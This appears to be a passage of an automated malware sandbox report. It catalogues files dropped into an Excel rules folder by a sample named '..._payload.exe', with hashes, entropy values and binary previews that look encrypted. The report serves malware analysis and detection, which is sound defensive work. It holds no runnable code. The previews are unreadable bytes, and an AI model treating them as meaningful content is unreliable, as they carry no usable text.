                                                                                                      Preview:<?xml_.".... P......:4.e......ju.u.Z...[......_E.Ma.e..i.W.....(..5.@.d.:B/....q<..0......YK.>.p.[.._....oL.e.....8........o....Ub.....A.=p}..ysV...,Q...u._.zj...1.=..M..-x.Nm4:.$...].C.:5..U..j.....~.~Vk.p..>.c<...)...u...............P..8C.../.-...6.K.;..j......."..i.t\.s......6.<O`..i..(0{...Fh>.....L.:...l..kkDFP..*.e.......m&.a..DnFj.~...#.3...%..,N/...........4G.Q5..P...6..aJ...........Qk........1. ....k.....k.....}.qM..E..%Q.......>N..oP...0....T1._.wR...G..l.P..3....e#..$L....[^'...p..R=.. ....F...V.IV.Pb7.S..(..-..D....cd...s$)H.@.............E6m.N...J.?.=...avP...pT.&.*1..w..<...v..C.....&.(.....]..?`...g(.....{......p....=V....m..i....h...9.N.fH.Y..r...k8......$.....>....m......-.Kz....D...dI6.<cT..@..|..$D..2.E|Vh.t...ml. .m...t&UR._...S......Aku..](.-_..<.e ~.C..yR...X...t..C,.q.z4.:.O............S........n...L.../5]...9H.C.-9..Am.CYL.....[.Y....'..7|m+...Z,....b..........A..nhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510012v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3884
                                                                                                      Entropy (8bit):7.952160018601995
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:HQfJ0uOf/iixlRvNUhB2fStuXH2EguDmJ:HMJ0hXiKlTuB2fiO2+2
                                                                                                      MD5:787D58FFC3B59B28A3DC296CBCC68309
                                                                                                      SHA1:BBA7BB6241DAA912FF08469637E77E02AEF9DDAC
                                                                                                      SHA-256:580D44D0EFB9FDF9AE0B7541FCA7E40512428DD3E9C62A9FA47203F96F8736F5
                                                                                                      SHA-512:74D1F812463176811CE3CCCF0CD91343B5796B2CDF3689E5B5F01228074D07E5832A34E0D3ED25C31F2D9FCD171B4A09CF29207D839F0F7218265F69465C88F0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...!.jp.T.k..h{$.l......v.*....XN.L"?.Q.._c.D+.s%..f.z..=^.eA7.!,Ci.B..[...o..vO..Y..#X...#aV..'.'4...+.I9...A.~u.....~.V. -O.....F.....#?.O....gRNF.c:...*7...^%.............&)..s../j......k....7.&f..c`M.....&.O..T......M.5..g.....+..Fj3.8.~..F...u....U/..~.=..~.<.l+..7.).(..&.-?.(.....!...Rby.............w...=......m.M..!..k...=...bH.=..I.(..&,=...e{b.5...e...z..ow.l.k.+!.....L`.:.9.<.tJ..A.Wg...T..D;. l5!1..R.l.h.u~.<..D....Z.$......zm?2...I..yc.8...".>Y|......^^..|.....l./^...s.(-H..q.M.b..........bi!.7..B.W........K..`.R.J...|.9p......qP....S.d%G9.F.u..J......(X~.ae.$..QT.tf.:...k....,... .X.3......uUJ...!..gc.O............m9....].g5...u.m_.....X..<28...r......F..@@$.%;N.]..Aa.i.J........A.0..QfR....8..$...S.d...M....b..<6&#....T.E....|.q.]SkQ..,4..[..>Z.-K.Mi.x..P.}....[..IeI9.QM|....NM:a.^....Z. fC....5.....8=.2R5.._...Ey.o..4a..ZH.l..?.;.H>.L...6m..={'...........PX.2..RU.nFb1.zG...t..5;.x.?..qt.........)\.pg.k...:.HN.]U*... ..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510015v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):790
                                                                                                      Entropy (8bit):7.696483070588671
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:wqLuan3rldR8bF1mTseE1Yi+tsKvVhihRO3Jc3dwyDtYjaAXFrHxQzv6cii9a:w0nZdoFYVuY/sKLuoJcNw0tCNxQzv6bD
                                                                                                      MD5:ED8462E5224E833C32915F887CC276C2
                                                                                                      SHA1:1F865B90846DE11036AA5D4E4B6ACA3EE95B473A
                                                                                                      SHA-256:7920A305F0461909BA6796D9E0E506DCD5B502278A050C8C23D3A19F4377C3E7
                                                                                                      SHA-512:4D892224A90B36179382BBC8164C0BEAA3F695635DE27B76FA6430787F983B1438E8853391C4468BC32495976FE383737BB850F158143C36E2220744629CA187
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlM.'....v7".....x....S2e.{\.An..m<L.5<>V..p..q'@_...nO.u..d.R..6..x*.._.....*gq.=>....;@...<...,...ge.c...%.Yr!.+....Gma#.o.N..tt-...0.....On.K].{+........i|.....f...C?.R...#...R...].?.#..w..H.K.AS...y..!.".@...g........Z.*N,..?.v.rGx.N..dc..M.Ae.Q..)<......w@.S.\.....3.2p7.......V...l/L...$~.8...Mx>..@r...u\}.>.....es.jQ...L..t..O...~......G...8.t....D..=i.JX.u}....s.#1,..xI...A....p..D~\...,..Eua[...I....Iy..a..GL.../i......I..n.3{...8j....S.lw..PSFp.v...',.=...<..i%....A...t....d......*=.'...q%*D...._.R...."W..@=WI._.e.X>....P..K.3C.R.lz.l>..)..x........sQr0..............zl1..!....=."..o..-.5.`...S.V........]..q{.;7).'....3N.?$.b..iQ.M..4.g9.g.}..A..m.O..L....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510016v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3934
                                                                                                      Entropy (8bit):7.946575637076658
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:xSKNCbLwjijA5bcXH1b3LId3mAfx7PGLfWN1GoTpjpzRIJ7:pmw5bK77U1PEfWnGIzRIJ7
                                                                                                      MD5:96D14397CA2FDF8D0B50A89DAE1B294F
                                                                                                      SHA1:F881D6054EBC4D62BB18E4B85475750BA95B2362
                                                                                                      SHA-256:271131293D481540B8981FD442C874C0CD5D32864815FDFFB6C47301C4D94E0C
                                                                                                      SHA-512:253A0A32B2E4EF18BC58682F1875EBDDAEB8382E40AC9289F1B49A80CC1AADFAE3D842D1FDF759516748C724729A80DFB863DACAD1F9663B4267700CF174C898
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlju.`..q)...|...Q.a..3he..V..tt.L.(m.........M.o=.R.........?.?f5...*.A...A....BD.1...s...q>..VYT1..c.({..d.8.x.....:...&.a..h.b......c+.|9..o........d0.<.@.K...4T\..C....s..^.%k,P...'D.-.$.*K...@.u:..;r.f.?..q......A..<.....s..I..$.....x..DYV..]@/\....?...1..Q@7y...e..`<..U..v.G.S...epXJ]..Vp.N7.....{X...D%...u....._.bj...bP._.+..4..nU....e....y.../.._.]......rK......1.,...h jfy....B.....?:.....G.O..........j........Qo...;....zJ`....54..d..[.......M.a..n.~5..;YNO.a....L&I.N:.|h.r#$'.%b..Z.....^....Ek.4.;a...n..\..5...Z..k....tS1.v.*.#C.f"a...=?...H5.J.Pw...=......#.....0.g>....[ {..m...,&.'S{....._&....W.*..0..T...w3..q..."..2.zVt.9....Q..@...mOQ ...v...........9c.....`..+h@.^.]...g;.N:. ..\(s$}.#n.;.....z.DRH....TF.........%....'...T.,uD.].....Yu*..M..{]......Q#....(......@0.:..k2.U!e.2g."Vx.yR1e.E.-+....aK .G".T...j..S<.>..K @..i$u..).......r.2.e...9.yZ.pi..O<.#SM/.J..^......}.w....a...P.}.~..F.H......J/.p..+...#Q.e.)......D-.4...V.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510017v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1148
                                                                                                      Entropy (8bit):7.795776945991212
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:C3AkqE01xzxO4I72zKPz8blBVmGcR9UIuR5Pi3sfuJev6bD:CB01xzbI72mmx69UIuR5KalwD
                                                                                                      MD5:FFEE70464EF11ED409CE8054DE1B657B
                                                                                                      SHA1:05EDC2C0EDDB0639C80A83316279018CECAD0553
                                                                                                      SHA-256:6C77A31C4186307F308BAAFE066B3E2D2E2E9ECBD1B434177CE4A12A30D1C33D
                                                                                                      SHA-512:4491EF9D780754CA79C2B6074BA2A4A74E5C78590DA5E0556BCDE7CA7EC4801E13F95BDD9BFDC262111B88400081ED1BAD653615F584C397E0EC1AA2F8E55DBA
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlB.R<0.=.BEqq...'....3....:...PSsLZ.LJ[:k&....?.%6..e4.XxK.n,].s.......K.!.....@..eO-.bA.\r...\.....b.v.....;9......kO.S...f.......p.g}m.wy.~.......@\'^....+..........,..\.%...._.....Ex....gSk...3.6.....R....,$...BH..Q..w&.?.].I....e..."'F.n..k(.G..9..A'@c....4CYz..2Sz5.....b..C........K..J.JH.zd..Q&.c...U...8.....{.x....%....Q...m....:@.I..".~..-D.....P)....F-c.eR...J.]...r.............N.....@.....o....e...F2.mA..T.59.......2B.S_..".!9.\.#...3&.A.H....v....X....p....l.Iak3.^.J.}.EN.I.,...........>...?...K.N........$.Q.....#..@.7mN.?'...7..ko...P#..d.?.......A.~\..z..zX.......p.:4........!.....ro.E..Q......DnG..D..l..8..nH....t..$..P..(1..@..f0)..._.S7p....0B..Z.....|..$%.8.S.......$V.N.......1@....i..y..#j.......{.q..0.,~.......T0B.rH.....}.GI.5$.p\....V'..84.Z.}.h...+t<X.J..(...//e.?....i.G6.4T....G#7.ED$v#.f..,...?..S....WD..>_.)&.c...[[{.$...";..U[B..N..m..l..Ari/...kP.U../...0mk...K.D.E...e.O.Gx;3.v.,....)^..u

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510018v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1782
                                                                                                      Entropy (8bit):7.882092688262954
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2uIn115LLGsZIsXDraFk3PKAXWK72El5Gco6b2t1wD:2b/LLvZIGra91xElAcontW
                                                                                                      MD5:734712A4960C5ACB6359D25E02C958E9
                                                                                                      SHA1:E91F396806E7E669D0C47B6FB612019FAD1A0CF8
                                                                                                      SHA-256:CA0BBC2F764E0B1A5FF85CBCB41C11F9D3196C0E87BAC1854610C25748ACCBA6
                                                                                                      SHA-512:0FCC3386E8F2103521999914303BEEE1AB897D519687808C54AC5A4681E64BEB10E903C53EC0449C121BE03A898C843F622E0E005F8110CE5418098C8BFC0875
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..ql2.B.w...290..9..z-.lQ..Z....$^.]\.f.h....)...4...||..l..A[..\c.|..@:ob.}z8..[....\..P..........0,...@.'B.C..3T.......=.7..1-&..... ...I~.....u...q..(%..$E...c..(~$..*..$5|Y.....W....!F...?Y8.?.J5l.A......z..y.yG.M.;(.W............S4.[.........ha..M.........d..u...YR].).Z...?..jo.p..m;0k.r`.j..@=oJ.KD..K^.z.|....S.^.`....z.^x,...eo(4..J0*...4.5V..;.=@c.....NM.{...R.........O9x......+).......2.k.f.....4.E....Z....O.e..C...Zh.)Q..)AO...S..f=......;..p.F!M8C.K..../....V@..J...L^..z..T.=P...@6.y.ka#$+..Z....F........{..s.%.....).|*..3..\.....2@)......<...g%...4.)..1...#.a.[...8.._.*.....m.np......P.....I +..MQj?...v....4Q*C]...\.. z..P....V..p..3.|y.....L.7..CZ.%[..e].v..r..d.r.O.........{O...c<....A....^..8r..N^Kh.C$vbLc...L...lV .:^.=.k?.!W.T".....x.eh-.5.....\.?z.n......N...a...o......_.....j..4u.m.hG......O.G.........W}.*..y....K....m.....-@.fn5..}Y..M.......4c....#...J!.fo....m..$.n.....v...x,7......"..4....YYx\'4o..6.m.....Iw

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510046v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):791
                                                                                                      Entropy (8bit):7.6797699067248235
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:6gJo3kGlh10DzX2ZGvUPIrOay4EDxpyXeQwbzKPzHHT4lw9bxknUUZoXvTv6ciik:653Bh18L21ffm0b+PzHHv9rcoXvTv6bD
                                                                                                      MD5:70373F6BA346E25B840A2386EF86F742
                                                                                                      SHA1:C9E91EA21D1EFDE36A95DA11F8B5638EBB5F3773
                                                                                                      SHA-256:E63B1B54D48A8BD45EEBA4221B09C3C0DDFED4A5F0AB5A13FEA1FB97BFA47E4D
                                                                                                      SHA-512:FD4A82E10AB7F9939A926D32764BF20971564C4F05157E5C0D3B342589CA75334EDDDBF9D4B429E235E399D0E6D1E60B11127C080CF3E894823F1016924B1528
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.c.+L2..W.N..r......V.Y..B.....K...8....*....f.R...}9.S...}\..J\.w.....u.l.m..S.k.../...u...@..'/......l........6...Y.6...L..if...iEFW.;..*W]xa;..X..P....@.......%.y~t.I.Z.:....i....C.l.5.....A....gV(~.....1A9..D=.5..L...=...Qo$~D.....34]..S.x...6.]}.z.<....&.@.=.......4v|.E.xh]^...._3Mq.x..H.M....p.5.-l....WI.-J....K.T..]N..w.L.S.GvQz(.....6BSUEv|/.6.D...........V..k...7S...:....(L3{LH..2.;...UO.$.z.I....v6.%...~.U..........|cW...... ......u.~...H..."A.F~..Cdv.D..FZ..iA..fs.....Mi...Qr...W2.B.].4..."..@....9.\.&o..o/...Bj.wmt.%..vn.!.......P...~.5.)vAX^..$.....~....8.........h...1..D...Y.7#.....R.&=ow8.W....7..%......_.J.ClA?E...N".ygXI..C........&+4~\%.....r..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510047v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1082
                                                                                                      Entropy (8bit):7.805493746597787
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:1BY6HoRZ3AaeWv7BhbJxWIpC0diKBWtS5GAscqv6bD:/ZI73AaeeVVe50diKwt4fscqwD
                                                                                                      MD5:687FA56976CEC535FF82D4D9AEC87A34
                                                                                                      SHA1:4B69C743C9677501FF77ADA20B25417C5ED9240A
                                                                                                      SHA-256:D6BAA1E9F190D6DFC7775818BAA318A02C1558FEFCE8265AAD85648495B88BAE
                                                                                                      SHA-512:E60EDF211DBBD8EC38FD98BB4CE0A918AA427B3562CC17CF532F304A8C9189F772CF4487B3AD2C15343354AA3F7D92887B205E7345E337EDB7F9B4ADF427CBE0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...R@...A[....H..h.....m9...P.I.21...t......=|..s...A..VN.N....T._...@....y..324.....~."...GIl....(.(.'.[.8D.......>kJE..l...y*:......`......`..y......C/.....`...h.u:...F-.$}....y...*..V....|.+.&...MU..V........!.g.&.........OrQV .....:&>".,...(p....}.p...$...F.E.l..W.(....Z..3..m|.{...o.:/..3.6..@..........|..J-}.D... .N../.d#..5.......5...je.C..9.i..i......G..6...Ou......_......1........l.=...\.&.\.n..7..C.....s.XO...#m'..Z.y...,..W8..O.[....4.x.3+b......t.h.......a^....^.J..\..S.".2.....yH.$.9',.......+(....N........j..c.'(..kO..e..P..}#..n.p..W...2.Qp...m97..J..%...Ag..,..Nj.D..#.R.-*...,e....Nng.`.K.\.5.;.*....[..G;.pR..B..n:9..aW..|.......]...d...-....4%(....?+......5..&..v/...x^...9Y....a~o...V. =..W.p.x......+|.j...M.K.....h.g..v....h.9....]Xd...h.L...w`...seK.\u...b.$.gU}.......D..+c.....Dj.fT!....O...N(....M....{Hg.#h...`....W....?6fe1?....S@.,^......'....:....^c:.(".....n.7..;._#..SSc.}N....!GZ.N..v@......H|!,.E.c

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510062v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1061
                                                                                                      Entropy (8bit):7.779166347021005
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TteHJ8XwhW8RCR/tIchs9KGacGAV1Uh/Dw6X0KBhv6bD:BeH2wERCHac9g06hhwD
                                                                                                      MD5:C9149E37085B3DA02A3A58C1D0B337CD
                                                                                                      SHA1:BFBD9CB25D31C7680DF7AB53725DDF4953B5D502
                                                                                                      SHA-256:881819220DABF23FAC369F0A3972DD4B31A065B3295D688DDD1698AB1C5E69FF
                                                                                                      SHA-512:7AE2B3CDE9E4BCA328F9A3C06B7E9C9C2ACA5B87DF10BE002437674395D1C84A818FEB41A34CA76EF846C9B71FFBE7901914DDDE57A0555871DE92BB17133BAB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.g.J%.w.9o.j..H'.N)..w)%.b...W&..4...].s.I+o!..R.W..58=N.U..w.k..V....3`../.. .j....e..0...A..n..x.......+|....s...6......xT..i!....>g/.\..Q.$..,..@.&n..P..\..2#..E..C....:".F.......G..L.s.4.Q..y..x...qT}*...Q.b.^.............NV.hJ?p...tO].....B.0..2.zl..*....E@-.H.6'.....-.4#".<..xb...0!;....9.._......X#....9.H7.Y.1..NA.k.f.*.%.J......nV.a.B-.Q>...w....b..9@5. / .6{.Gro..)..:k-..G..J-......2........L..^.!...m|.n.%}x.E.>.8Uk..."?..-}.i..q....H......[.QQ.w&.ma6f.0..3..1.........."..d........3.H.h-%.lT^.._...EY..>.N.%?.........iGKHFl%#.....q.X..../P(....n*A.>Z...mi.;...!.+aj... ..C....s..C%...i..0y.#.7J.>.....2L2f{...Bh..]`..A_.r...G.XI...-.8J..[....8....*.'..Y.#.x.P.O+>.(....V..A...T.|.vU_.-....d..........1PK....p...#..).X.E.(.....6....f....B(b.E.B.H$.k....g.*......v.....l1V...u..(..........K.G..y.W}V.YK..z..T....-.h...J......h.^.*r..B..+x....-......6C.\..Ba.J...H...aA.....UJ.....`..kn.C..NUE.9...}c>K.".'...X.Y.v4k.hZRMDGn2o1XdryxaQ

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510063v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):801
                                                                                                      Entropy (8bit):7.732458584528162
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:FrN11I5AHc+d71BW9ZB6C6EyxHY5ImxABV8d12Rjnv6bD:H11jHVd71kzD482oUnwD
                                                                                                      MD5:FBFF3B05F518174B51F74DF6152EF437
                                                                                                      SHA1:5FAADE19951A507B3B5517C565FB349C22ECCAA2
                                                                                                      SHA-256:57FE2BFA2B9A010B6CDF470C435C20A7B72DE7B8F81F6296B29272A17BBB9C8F
                                                                                                      SHA-512:92CA4AE1BE7C7CD251C87384EC7AC962D69ACEB042ADB9007825A597C3E1FF4DA930B9FDFC7D8DF86AACA32F90B72782C33F53C30AE2F3233B55823F55CAF3B5
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml`\.D.i..b..uO.....b...L.e..!....@.LN..c.hN..g[..Q.....2.r.ey..........;...u.6...JW..........s.....dA"I.-....J~..a.o....{.J..>6.....x.i%C..r:..1..8.....Fl....Y.i.c.......p......sK.C..5z.".V.<.z).o....7.m..#.|Sw.H=.j.....?.X...=..#.^..;k.......Q.T,.$.........LM..S..w..S..d.9...0*.aY...}.1).ST5~.y.l....).....:sA..$......!Qvp....;..=.6Jv..i..9.=\W.u.x...rasI|.......Lbvb.W/H..(....Q.["......]......C.....Pu/.D1.z|.:.vog......rEW.].!M......T.b%S...ouz.z...uM"....=.)2x.X..l.@..N.=?9..O..C....suz|m8.c..9..O.C.0y.~]_..g..@2TRa$....o...............G...0.y]Yi.<*S*.1....k..JveE............5V.A!I..qD$.g..i......n.C.L........}..).....9$........C...Y.;m........fx..f&...]k..1...:q.i..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63028v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1485
                                                                                                      Entropy (8bit):7.870971161727732
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:hqfMCS0EeZCMhDtRFYxKYw3V4/EpNBkSwNWBAqa9c2FStnDKST89P3v6bD:3CUeZx3mkV4MpNa9B9c2M2i8RwD
                                                                                                      MD5:12B6187034DD755EB4F991A0C98AA7E6
                                                                                                      SHA1:7228335DFF60E5C02F20127EB3ECA0A5EC8A78B0
                                                                                                      SHA-256:293F6F6FF3B726BFAEEE21CB1D92F5AB9115AAE7B258CCB6B4D061856D1FE219
                                                                                                      SHA-512:C9EF145E3766A28A3FC290D39F41172DA9CA1F6B8CAACF015C7FCD09BA9C0585754421B63AE9D519592150FF449627A71C9CDDD380A9AEE551A48F8BC14B0CF9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml3...Y.....nR.A..s@Ky.5..V..`..f)..2s..o....^.ioy*..xB2......4K.dS...45......+..)O......7.':.....s...8."h..5.F.}N.Vlm..,E...p..1h..N.x..#V..^U.V....H.i......e....D.z.W/......!.L.,4.k.'....tqKv.b._...8..>8.\l....YXE.75.L.S=....X..0v......V.-.5....r.[.`]`..z%...C...QM..l..4....~r......=..f.....v./e$...rD{.F.....Fl#.pJ<.....+...3......'l...Tb...(.........v.. ."..5`4..:....1....(..N.[...S.MI?......x..K..)...\..~"../.. .N.Z...Ia..P..5.W;. T.{.Z..s.kn.........6.o.......{"...j.7......2o@J..goi...S.......E/...=q[.v.x....~K8.U...].A.].M..9.h.%..~..\..Yaz.zj'.S.K....w..,K..(Y.).....B.y....b.....1.~SNw.F..Y.:......`..a(}..r.).]..0[r....SSi2...H...+..8...........n.pI.L.r..9...7/.M7t.P...;...c..<..s...K...O....*....-}d0.CL......].)k.{.._...;1......l.....><......kF...G.&.)..A...f]....T.*nq8Q.p..g..m.G.H.j..i..\...&Z.T..u......&./.x.$M .aMx....*..a....CH..F../.G.}]<..2H....`...{....{.....G._.A=...CS..V.;#F2..o..D.:..0........l..&..tm.<..T..3.....J.]2.A

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63030v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1340
                                                                                                      Entropy (8bit):7.856141612246096
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:fItxMglgizAKm3ksibJAJc9VYLjWBHIXttIGopOzPaMPqqIv6bD:VizgZ4AeWj6HITokCMpIwD
                                                                                                      MD5:568348C4413F14D197FEB84C3A562F21
                                                                                                      SHA1:5B50CE5B9DA07A2545B3C72D7010C25212424FB7
                                                                                                      SHA-256:18444683E4121289303EB6BBC4472F414FF7EA6468FCA28F4722593ABFC39C98
                                                                                                      SHA-512:655EBA569AD3B144FC8384E341EF93906BD3450ACB4E2F50D168D3110596C00DE99C23CDD58B0BA6BDAC64D4CD08A82D902134BF3F63E92E5848BADFDE365FC7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..l.9..<....x..k.Z.......|G.bQK^..E.6.)Oq...[.o....+p)..eq..l.F..2...'...-......I.,.6.em>.?...P..6.&\b..0...@jG{\..g......3X..p..*...c..H..dp!Cx.L......G....zN.Hp...z.k....*.0..:.....E.0..c..QT<S_.3'...)..#.._u.....B.._?U^.v..h..f9N."RIo^..f...MD6..([`......:$g.T`)..w.uI.!.]...{....^.@wi.>.......T..A9..=...F\..F.H.]...H.........stN...........mVT.Q..{.W.~cz.Q.Vs7l....H..7..$.j.E.....P......&.7.[.t..Zw..#...|..u.j..h...I.j"..Qb.kW..6.(...7.....oj`.h$....PP{...Q=..m.....P/.].....b..i3>..G.kf{.'..Yd...&DU.....8.%u.JY{V:.V....)..'B.U...r.v.I...Q......S.k..`.6.b.M......F.f<0w.......7......L^...."...h..mQ.Qg...<.....=..".x...Pv..J...^..)P...IAN.L...z..jx........2...$Xg.y....`..rFJ.T....S.'_tMU.X.=.X.@....-.s...D>.c.[.-.G.SxY:.]r.o...-...A...i........N.^J.Q0#*.Lz..l.....&.=.*Jd.2 C....X. ......+.U...#..J...n..l[.#.R&......K5S..{".l......N.-.M....pI......9....$B.T.[....[...Nw...Cj...<..|.;......a.Ao.....G...#.dXd.>.k.b...Cv..`a.#.9I.v.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63038v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1261
                                                                                                      Entropy (8bit):7.833324309543461
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AsZ05A0Bx0t1K1IKQ2L8nMlfr1KBjtTYHfPW1acxe9TiDpHWukv6bD:AJAe0RKNg0Hm1LxwuDpH/kwD
                                                                                                      MD5:CFFCDEF19727147E7AE5DD1A0963DDD6
                                                                                                      SHA1:E8195C8A774025A6D413E41B4F59BFE1DE2B67BC
                                                                                                      SHA-256:E083ACF51CB06751CB5C69F1035A164C886F48570B5121A8209EAE0EB893F5D2
                                                                                                      SHA-512:21B514B77269E6701092805FD3F6B523C7486D1C513FDB2C666C955EEA66C91D5BEA140BB7AAC47A936D75B2C0A3111FD94697E42DE0B3098AEE190EE56A8A1B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml........# Q..|....K.{bE].:R......{..xbl..v..<.V)&......)1IX...9h.C..E.^..k...$...P...T...pj..v.m.......8W.]......1...=.$.c.jn.....u.?rB...._.$5O=.........KA*...Aa<B...A J..+..?..68.k.<.h.....b....._<...<r......OL.*@..u...#.x..@..s..J...6EE.Yn..g..T.i.C.)....E.....K'6 k...]....n.8......+.......{...Jb.$.!.~...B.9T..\...$.(7}%..G@UF.A%H..~.. ..^.)..$.U..Hn.......t..../.B.C.T...Q...{....<.nT.R6Ow.L..G(]..p.!f....%6..-.@.H....z.v..u\I....5..R.YJ..".8..C?.....n.yc.......L..S......."n.s.E......(j.FR..W.........I.........9Y.....w...K......BSG.!.......ygf...sD.Z......K..5.=....G...J..s.l....^.^"..#T.K.....!...JY.x....:..\...g./6..........=n..]i..T."s.G..._.a"..~.k.../...H..g^w.........>..x.`.:R...4Co........f..........g..${..>.......M*3j/.J.h>.KXs.r.i...]...s.L.....WiA.....Ig.b..c..*..:..93.......z$.h.?lv.p.:b.C..EP.H'gm.q..........*...>.B......'......*.t..mH`...[.....Y...FZL.9h.....t.7.o.b.7%.".Z.+A(Z....5C..~.n...Z.[..tWa.7.......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule63040v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1268
                                                                                                      Entropy (8bit):7.835164898904727
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:lBIIXdIx+YgnONSgLx7OGooOMshARH/enB2x24VxI8ymFL8v6bD:bIIXKx6OAgxIoJ0BC24Ve8b8wD
                                                                                                      MD5:1B51C56C79B4D570370CE57A692FB279
                                                                                                      SHA1:9196C63D099D6D2B8B6F0711F0DA910B85B99F42
                                                                                                      SHA-256:2496088F0503C2150B7392FE454A2CA04E46F712AB887048E202FB64897E6E6E
                                                                                                      SHA-512:623DD0CF27E2D15B246828B05BE8355BBC667B897E27917701BB4257FE1F094F53E937BBC4DCF03BDF7A44928289612431357F5013139450D8126D2B92460C56
